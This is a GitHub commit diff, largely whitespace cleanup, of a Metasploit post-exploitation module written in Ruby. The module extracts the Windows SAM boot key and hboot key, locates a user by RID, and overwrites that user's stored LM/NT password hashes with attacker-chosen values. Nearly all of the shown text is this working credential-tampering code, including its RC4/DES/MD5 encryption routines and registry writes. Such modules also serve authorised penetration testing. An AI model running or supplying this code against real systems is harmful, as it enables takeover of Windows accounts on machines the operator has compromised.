Struggling with tidyness
p3nt4
GitHub
parent
586b2d92e2
commit
c898e768f6
|
|
@ -8,7 +8,6 @@ require 'rex'
|
|||
require 'msf/core/auxiliary/report'
|
||||
|
||||
class MetasploitModule < Msf::Post
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Registry
|
||||
|
|
@ -34,23 +33,18 @@ class MetasploitModule < Msf::Post
|
|||
@sam_numeric = "0123456789012345678901234567890123456789\x00"
|
||||
@sam_empty_lm = ["aad3b435b51404eeaad3b435b51404ee"].pack("H*")
|
||||
@sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
begin
|
||||
|
||||
#Variable Setup
|
||||
username=datastore['user']
|
||||
pass=datastore['pass']
|
||||
|
||||
#Detecting password style
|
||||
if pass.length==32
|
||||
print_status("Password detected as NT hash")
|
||||
nthash = pass
|
||||
lmhash="aad3b435b51404eeaad3b435b51404ee"
|
||||
|
||||
elsif pass.length==65
|
||||
print_status("Password detected as LN:NT hashes")
|
||||
nthash = pass.split(':')[1]
|
||||
|
|
@ -62,36 +56,23 @@ class MetasploitModule < Msf::Post
|
|||
end
|
||||
print_line("LM Hash: "+lmhash)
|
||||
print_line("NT Hash: "+nthash)
|
||||
|
||||
print_status("Obtaining the boot key...")
|
||||
bootkey = capture_boot_key
|
||||
|
||||
print_status("Calculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")
|
||||
hbootkey = capture_hboot_key(bootkey)
|
||||
|
||||
print_status("Searching for user")
|
||||
ridInt = get_user_id(username)
|
||||
rid = '%08x' % ridInt
|
||||
print_line("User found with id: " + rid)
|
||||
|
||||
print_status("Loading user key")
|
||||
user = get_user_key(rid)
|
||||
|
||||
#print_status("Decrypting user keys...")
|
||||
#users = decrypt_user_keys(hbootkey, users)
|
||||
|
||||
print_status("Modifying user key")
|
||||
modify_user_key(hbootkey, ridInt, user,[nthash].pack("H*"),[lmhash].pack("H*"))
|
||||
|
||||
print_status("Carving user key")
|
||||
write_user_key(rid, user)
|
||||
|
||||
print_status("Completed! Let's hope for the best")
|
||||
#print_status("Carving Hashes")
|
||||
#write_user_keys(users)
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
|
||||
rescue ::Exception => e
|
||||
print_error("Error: #{e}")
|
||||
end
|
||||
|
|
@ -104,10 +85,8 @@ class MetasploitModule < Msf::Post
|
|||
return if not vf
|
||||
vf = vf.data
|
||||
ok.close
|
||||
|
||||
hash = Digest::MD5.new
|
||||
hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
|
||||
|
||||
rc4 = OpenSSL::Cipher::Cipher.new("rc4")
|
||||
rc4.key = hash.digest
|
||||
hbootkey = rc4.update(vf[0x80, 32])
|
||||
|
|
@ -151,11 +130,6 @@ class MetasploitModule < Msf::Post
|
|||
#Check if hashes exist (if 20, then we've got a hash)
|
||||
lm_exists = user[0x9c+4,4].unpack("V")[0] == 20 ? true : false
|
||||
nt_exists = user[0x9c+16,4].unpack("V")[0] == 20 ? true : false
|
||||
|
||||
#If we have a hashes, then parse them (Note: NT is dependant on LM)
|
||||
#hashlm_enc = user[hoff + 4, 16] if lm_exists
|
||||
#hashnt_enc = user[(hoff + (lm_exists ? 24 : 8)), 16] if nt_exists
|
||||
|
||||
print_status("Modifiying LM hash")
|
||||
if lm_exists
|
||||
user[hoff + 4, 16] = encrypt_user_hash(rid, hbootkey, lmhash, @sam_lmpass)
|
||||
|
|
@ -171,14 +145,11 @@ class MetasploitModule < Msf::Post
|
|||
end
|
||||
|
||||
def rid_to_key(rid)
|
||||
|
||||
s1 = [rid].pack("V")
|
||||
s1 << s1[0,3]
|
||||
|
||||
s2b = [rid].pack("V").unpack("C4")
|
||||
s2 = [s2b[3], s2b[0], s2b[1], s2b[2]].pack("C4")
|
||||
s2 << s2[0,3]
|
||||
|
||||
[convert_des_56_to_64(s1), convert_des_56_to_64(s2)]
|
||||
end
|
||||
|
||||
|
|
@ -187,7 +158,6 @@ class MetasploitModule < Msf::Post
|
|||
end
|
||||
|
||||
def encrypt_user_hash(rid, hbootkey, hash, pass)
|
||||
|
||||
if(hash.empty?)
|
||||
case pass
|
||||
when @sam_lmpass
|
||||
|
|
@ -199,26 +169,20 @@ class MetasploitModule < Msf::Post
|
|||
end
|
||||
|
||||
des_k1, des_k2 = rid_to_key(rid)
|
||||
|
||||
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
||||
d1.padding = 0
|
||||
d1.key = des_k1
|
||||
|
||||
d2 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
||||
d2.padding = 0
|
||||
d2.key = des_k2
|
||||
|
||||
md5 = Digest::MD5.new
|
||||
md5.update(hbootkey[0,16] + [rid].pack("V") + pass)
|
||||
|
||||
rc4 = OpenSSL::Cipher::Cipher.new('rc4')
|
||||
rc4.key = md5.digest
|
||||
rc4.encrypt
|
||||
|
||||
d2o = d2.encrypt.update(hash[8,8])
|
||||
d1o = d1.encrypt.update(hash[0,8])
|
||||
enchash = rc4.update(d1o+d2o)
|
||||
|
||||
return enchash
|
||||
end
|
||||
|
||||
|
|
@ -230,7 +194,6 @@ class MetasploitModule < Msf::Post
|
|||
lm_magic = 'KGS!@\#$%'
|
||||
key = key.ljust(14, "\0")
|
||||
keys = create_des_keys(key[0, 14])
|
||||
|
||||
result = ''
|
||||
cipher = OpenSSL::Cipher::DES.new
|
||||
keys.each do |k|
|
||||
|
|
|
|||
Loading…
Reference in New Issue